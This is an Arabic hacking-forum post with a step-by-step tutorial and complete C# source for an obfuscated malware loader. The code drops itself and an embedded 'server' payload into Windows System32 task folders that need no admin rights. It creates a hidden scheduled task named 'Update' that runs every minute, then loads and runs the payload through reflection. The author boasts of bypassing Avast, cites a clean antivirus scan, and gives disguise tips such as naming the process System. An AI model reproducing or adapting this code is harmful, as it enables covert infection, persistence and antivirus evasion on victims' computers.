10.12.2017 النسخ لمسارات لاتطلب صلاحيات تشغيل الملف تحت عملية اخرى تخطي افاست والكثير


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,569
2,965
1
حياكم الله
نقطة الادخال
C#:
Interaction.CallByName(Interaction.CallByName(Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 65, 115, 115, 101, 109, 98, 108, 121 }))?.GetMethod(Bs(new byte[] { 76, 111, 97, 100, 70, 105, 108, 101 }),
                  new[] { typeof(string) })?.Invoke(null, new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }) }) ?? throw new InvalidOperationException(), GetEn(), CallType.Get), GetIn(), CallType.Method, 0, null);
عملت اداة باول مرة تشغيل شغلها بصلاحيات الادمن رح تجيب لك مسارات المجلدات
في سستم32 وويندوز
بثاني مرة تشغيل شغلها بدون صلاحيات رح تعطيك مسار واحد فقط يمكنك الكتابة عليه
بدون صلاحيات الادمن "بموضوعنا مابدنا الا مسار واحد لاصدار كل ويندوز"
طبعا ليش عملت هيك انه باول وثاني تشغيل
عشان اتخلص من مشكلة الاعتماد على اداتين الاداة نفسها
ان شغلناها بصلاحيات بتسوي شي وان بدون صلاحيات بتسوي شي ثاني
"تنفع كفكرة للتلغيم على فكرة" :15:
جبنا مسار للويندوز 10 بينطبق عليه الويندوز 8 ومسار للويندوز 7
وتحت رح تشوف عملنا تحقق من نوع اصدار الويندوز وحسب النتيجة
بيتم الكتابة على المسار المراد المتوافق مع نوع الويندوز
صورة متحركة عن عمل الاداة



اعتمدنا على المسار الموجود في ويندوز 10 والمسار الموجود في ويندوز 7
بعمل حلقة ان كان ويندوز 10 او 8 ينسخ الملفات على المسار التالي

C#:
C:\Windows\System32\Tasks_Migrated
وان كان الويندوز 7 ينسخ الملفات على المسار التالي

C#:
C:\Windows\System32\Tasks
الان وحسب الكود الناتج هنا شوف السورس "صورة متحركة"
الصورة المتحركة بدها وقت لان حجمها كبير جدا ههه




شكله بخوف صح ههه ..شرحت لك من تحت الـ0 شوف الفديو لاتخاف
الفديو 45 دقيقة :15:
حسب السورس رح نقوم بالتالي

C#:
if (GetWindwosClientVersion() == "Win7")
اذا كان ويندوز 7 نفذ التالي

C#:
var portableExeDir = Application.ExecutablePath;
                if (portableExeDir != Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }))
                {
                    System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = Bs(new byte[] { 115, 99, 104, 116, 97, 115, 107, 115 }), Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }) + '"' });
                    var fi = Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 73, 79, 46, 70, 105, 108, 101 }));
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }), Hh2((byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })) });
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }), (byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath }) });
                }
رح اشرح لاتخافو مع انني شرحت بالفديو كثثثثثثثيييييير
تحقق من المسار الحالي الكامل للملف ان لم يكن يساوي

C#:
C:\Windows\System32\Tasks\System.exe
قم بعمل مهمة مجدولة تقوم بتشغيل الملف كل دقيقة "سويها كل 10 دقائق نصيحة"

C#:
C:\Windows\System32\Tasks\System.exe
النصيحة عشان المستخدم مايعرف ان الملف اللي اشتغل تابع للملف اللي شغله من دقيقة
الكود الخاص بالامر هذا هو هنا

C#:
System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = Bs(new byte[] { 115, 99, 104, 116, 97, 115, 107, 115 }), Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }) + '"' });
ثم قم بنسخ البايتات اللي رح نحقنها بنهاية ناتج السورس الى المسار
C#:
C:\Windows\System32\Tasks
باسم Bashar.exe
هنا الكود للعملية هذه
C#:
fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }), Hh2((byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })) });
وعشان اللي بيسال ايش السطر اللي قبله وايش هو fi
C#:
var fi = Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 73, 79, 46, 70, 105, 108, 101 }));
هو عبارة عن System.IO.File كمان اخفيناها عالاخر :15:
ثم انسخ ناتج السورس باكمله الى المسار
C#:
C:\Windows\System32\Tasks
باسم System.exe طبعا لازم ننسخه عشان هو اللي رح يشغل لنا Bashar.exe
تحت العملية الخاصة به نصيحة "سمي البروجيكت System"
النصيحة عشان تظهر بالعمليات بنفس الاسم والمسار بالسستم بكون يعني امورك تمام
الكود الخاص بنسخ الملف باكلمه الملف الحالي للمسار المذكور بالاسم المذكور هو التالي
C#:
fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }), (byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath }) });
تماام الان خلصنا الشرط دام الويندوز 7 والمسار اللي تم تشغيل الملف منه مش المسار المراد النسخ اليه
يعني الملفات لسا ماتم نسخها لهيك نسخناها وعملنا مهمة مجدولة عشان يشغله مرة ثانية
الكود السابق كله فوق لاتلعب فيه الا انك تغير اسم الملفات ان حبيت
كيف ووين اصلا المسار واسم الملف مش مبين مش هيك .؟
شوف الفديو بتعرف وين صارو وكيف تغيرهم علمتك كل شي
انا اخفيت كل شي اسمه سترينج حتى ان لاحظت اخفيت اسم عملية المهام المجدولة schtask
طيب الان وقت بيشتغل الملف نفسه بالمهمة المجدولة رح يلاقي المسار الخاص بالتشغيل هو نفسه
يعني الحلقة مش رح تتحقق ورح يروح على else
C#:
else
                {
                    Interaction.CallByName(Interaction.CallByName(Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 65, 115, 115, 101, 109, 98, 108, 121 }))?.GetMethod(Bs(new byte[] { 76, 111, 97, 100, 70, 105, 108, 101 }),
                                                                      new[] { typeof(string) })?.Invoke(null, new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }) }) ?? throw new InvalidOperationException(), GetEn(), CallType.Get), GetIn(), CallType.Method, 0, null);
                }
هذه هي نقطة الادخال بشكلها الجديد ههه "مامبين منها شي"
طبعا لاتغير فيها شي لانها جاهزة للاستغلال على ويندوز 7 بشكلها الحالي
الا اللهم ان غيرت اسماء الملفات فوق لازم تغير اسم الملف اللي رح تشغله هون كمان
يعني ان غيرت Bashar.exe لازم تغيره هون كمان بس بعد متحوله ل بايت اراي
علمتك كيف بالفديو للمرة الالف لاتخاف والله انني شارح كل شي من ال0
الان منجي تذكرتو اول if ؟ اللي بتتحقق لنا من نوع نظام التشغيل
C#:
if (GetWindwosClientVersion() == "Win7")
اكيد الها else عشان ويندوز8 وويندوز 10 صح ؟
يلا نجي ان كان الويندوز 10 او 8
C#:
else
            {
var portableExeDir = Application.ExecutablePath;
                if (portableExeDir != Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }))
                {
                    System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = Bs(new byte[] { 115, 99, 104, 116, 97, 115, 107, 115 }), Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }) + '"' });
                    var fi = Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 73, 79, 46, 70, 105, 108, 101 }));
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }), Hh2((byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })) });
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }), (byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath }) });
                }
مثل فوق رح يتاكد من مسار التشغيل لاول مرة اكيد مارح يساوي المسار
"ها اي مسار.؟" المسار الاخر اللي ان منكتب عليه بالويندوز 10 مابده صلاحيات ادمن
وهو هذا
C#:
C:\Windows\System32\Tasks_Migrated
قلت له احجز لي مهمة مجدولة جديدة بالمسار المذكور والملف باسم System.exe
هنا الكود الخاص بذلك
C#:
System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = Bs(new byte[] { 115, 99, 104, 116, 97, 115, 107, 115 }), Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }) + '"' });
الان منو بيتذكر السطر الثاني وش هو .؟
C#:
var fi = Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 73, 79, 46, 70, 105, 108, 101 }));
هو عبارة عن System.IO.FIle اخفيناها
ووش رح نسوي دام ان الملفات مش منسوخة والملف مش موجود بالمسار البدنا اياه يكون موجود فيه
هوة والملف الثاني يعني سيرفرنا اللي رح نحقنه بالملف الاصلي ؟
طبعا رح ننسخ الملفات
C#:
fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }), Hh2((byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })) });
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }), (byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath }) });
رح ننسخ السيرفر باسم Bashar.exe والملف اللي رح يشغل السيرفر
تحت عمليته بالذاكرة باسم System.exe
طيب منجي الان على else الخاصة بالويندوز 10 او 8 بعد مايتم تشغيل الملف
من قبل المهمة المجدولة رح يشوف مسار التشغيل هوة نفسه مسار الشرط
فرح يطلع من الشرط ويروح على else
C#:
else
                {
                Interaction.CallByName(Interaction.CallByName(Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 65, 115, 115, 101, 109, 98, 108, 121 }))?.GetMethod(Bs(new byte[] { 76, 111, 97, 100, 70, 105, 108, 101 }),
                  new[] { typeof(string) })?.Invoke(null, new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }) }) ?? throw new InvalidOperationException(), GetEn(), CallType.Get), GetIn(), CallType.Method, 0, null);
                }
مثل مقلت فوق هذه نقطة الادخال قلت له يشغل لي الملف Bashar.exe تحت العملية الحالية
والملف موجود بالمسار التابع للويندوز 10 او 8 وهو هذا
C#:
C:\Windows\System32\Tasks_Migrated
وبس سلامتكم تحت فيه الفانكشنات اللي استخدمناها
اول شي عشان نحدد مكان نسخ الملف الاول السيرفر
يعني سيرفرنا رح نحقنه بالملف الاصلي كيف يعرف الملف من وين يجيبه
لهيك حددنا هالشي بالفانكشن اللي تعودنا عليه واللي شرحتها بالصورة هنا


C#:
static byte[] Hh2(byte[] bb)
        {
            var test2 = new byte[12288];
            Array.Copy(bb, 9216, test2, 0, test2.Length);
            return test2;
        }
وفيه فانكشن لتحديد اصدار الويندوز

C#:
public static string GetWindwosClientVersion()
      {
          int major = Environment.OSVersion.Version.Major;
          int minor = Environment.OSVersion.Version.Minor;
          int build = Environment.OSVersion.Version.Build;
          if (major == 6 && minor == 1)
              return "Win7";
          if (major == 6 && minor == 2 && build == 9200)
              return "Not7";
          if (major == 6 && minor == 2 && build == 9600)
              return "Not7";
          if (major == 10 && minor == 0 && build == 10240)
              return "Not7";
          return "Win7";
      }
فحص السورس كلين اكواد يعني كلين
ClassLibrary11.exe | 0/36 | NoDistribute

الموضوع مثل ماقلت يحمل حقوق العديد من الشباب
الاخ امير وفكرة المسارات التي لاتتطلب صلاحيات مسؤول
عملت اداة للفكرة واستخرجت المسارات من ويندوز 7 و10
الاخ قتيبة واستخدامه لـCallByName في اخفاء الانتري بوينت والانفوك
الاخ هاك تول جبنا منه فقط فكرة تشغيل الاسمبلي من ملف
مع انني منزل موضوع عليها بس دام اني سويت الشرح عشان اللي نزله
والباقي الحقوق لي :15:
لمشاهدة الفديو من هنا 45 دقيقة مثل ماقلت لان شرحت كل شي
على الطريق دعسنا الافاست بالسورس هذا ان احد مهتم يعني
السورس جيد جدا وقوي جدا ..واعتقد لو ماشرحي هنا او بالفديو
رح تشوفه طلاسم :15:
بعيدا عن ماتم لاجله عمل الشرح رح تستفاد منه بعدة امور
نصيحة شوف الفديو رح تتعلم امور مااحد بعلمك اياها :10:
السورس كود كاملا من هنا
والفديو من هنا
https://drive.google.com/file/d/1QHUow6OAO2zMsBDWzOuHY5V4UvIXvjfS/view?usp=sharing
C#:
using Microsoft.VisualBasic;
using System;
using System.Text;
using System.Windows.Forms;

namespace ClassLibrary11
{
    public class Class1
    {
        public static void Main()
        {
            if (GetWindwosClientVersion() == "Win7")
            {
                var portableExeDir = Application.ExecutablePath;
                if (portableExeDir != Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }))
                {
                    System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = Bs(new byte[] { 115, 99, 104, 116, 97, 115, 107, 115 }), Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }) + '"' });
                    var fi = Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 73, 79, 46, 70, 105, 108, 101 }));
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }), Hh2((byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })) });
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }), (byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath }) });
                }
                else
                {
                    Interaction.CallByName(Interaction.CallByName(Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 65, 115, 115, 101, 109, 98, 108, 121 }))?.GetMethod(Bs(new byte[] { 76, 111, 97, 100, 70, 105, 108, 101 }),
                                                                      new[] { typeof(string) })?.Invoke(null, new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }) }) ?? throw new InvalidOperationException(), GetEn(), CallType.Get), GetIn(), CallType.Method, 0, null);
                }
            }
            else
            {
                var portableExeDir = Application.ExecutablePath;
                if (portableExeDir != Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }))
                {
                    System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = Bs(new byte[] { 115, 99, 104, 116, 97, 115, 107, 115 }), Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }) + '"' });
                    var fi = Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 73, 79, 46, 70, 105, 108, 101 }));
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }), Hh2((byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })) });
                    fi?.GetMethod(Bs(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                        new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 83, 121, 115, 116, 101, 109, 46, 101, 120, 101 }), (byte[])fi.GetMethod(Bs(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath }) });
     
                }
                else
                {
                Interaction.CallByName(Interaction.CallByName(Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 65, 115, 115, 101, 109, 98, 108, 121 }))?.GetMethod(Bs(new byte[] { 76, 111, 97, 100, 70, 105, 108, 101 }),
                  new[] { typeof(string) })?.Invoke(null, new object[] { Bs(new byte[] { 67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 83, 121, 115, 116, 101, 109, 51, 50, 92, 84, 97, 115, 107, 115, 95, 77, 105, 103, 114, 97, 116, 101, 100, 92, 66, 97, 115, 104, 97, 114, 46, 101, 120, 101 }) }) ?? throw new InvalidOperationException(), GetEn(), CallType.Get), GetIn(), CallType.Method, 0, null);
                }
            }

        }
        private static string GetEn()
        {
            byte[] doit = { 0X45, 0X6E, 0X74, 0X72, 0X79, 0X50, 0X6F, 0X69, 0X6E, 0X74 };
            return Bs(doit);
        }
        public static string GetWindwosClientVersion()
        {
            int major = Environment.OSVersion.Version.Major;
            int minor = Environment.OSVersion.Version.Minor;
            int build = Environment.OSVersion.Version.Build;



            if (major == 6 && minor == 1)
                return "Win7";
            if (major == 6 && minor == 2 && build == 9200)
                return "Not7";
            if (major == 6 && minor == 2 && build == 9600)
                return "Not7";
            if (major == 10 && minor == 0 && build == 10240)
                return "Not7";
            return "Win7";
        }
        private static string Bs(byte[] bashar)
        {
            return Encoding.ASCII.GetString(bashar);
        }
        private static string GetIn()
        {
            byte[] inv = { 0x49, 0x6E, 0x76, 0x6F, 0x6B, 0x65 };
            return Bs(inv);
        }
        static byte[] Hh2(byte[] bb)
        {
            var test2 = new byte[12288];
            Array.Copy(bb, 9216, test2, 0, test2.Length);
            return test2;
        }
        private static byte[] Windows()
        {
            byte[] windows = {
                0x57, 0x72, 0x69, 0x74, 0x65, 0x41, 0x6C, 0x6C, 0x42, 0x79, 0x74, 0x65,
                0x73
            };
            return windows;
        }
        private static byte[] Microsoft()
        {
            byte[] microsoft = {
                0x52, 0x65, 0x61, 0x64, 0x41, 0x6C, 0x6C, 0x42, 0x79, 0x74, 0x65, 0x73
            };
            return microsoft;
        }
    }
}
 

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك